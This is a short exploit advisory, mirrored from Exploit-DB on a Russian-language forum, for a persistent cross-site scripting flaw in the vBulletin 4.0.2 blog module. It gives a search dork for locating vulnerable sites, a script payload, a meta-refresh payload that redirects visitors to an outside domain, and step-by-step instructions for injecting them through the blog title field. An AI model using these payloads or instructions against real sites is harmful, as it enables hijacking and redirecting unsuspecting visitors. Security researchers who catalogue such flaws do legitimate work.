- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 11871
- Проверка EDB
-
- Пройдено
- Автор
- FORMATXFORMAT
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2010-03-24
Код:
Vbulletin Blog 4.0.2 XSS Vulnerability
Author: FormatXformat
Version: Vbulletin 4.0.2
Dork:
Powered by vBulletin™ Version 4.0.2 Copyright © 2010 vBulletin Solutions, Inc. All rights reserved.
The script is affected by Permanent XSS vulnerability, so you can put in bad java script code
<script>alert('put this script in title')</script>
<meta http-equiv='Refresh' content='0;URL=http://db-exploit.com'>
1st register
Go to Blogs page
Create New Post
Inject your java script into Title Box
You must go back to Main page to see this XSS effect.
Greets: Neo, Sa3id, All Tkurd.net Members- Источник
- www.exploit-db.com
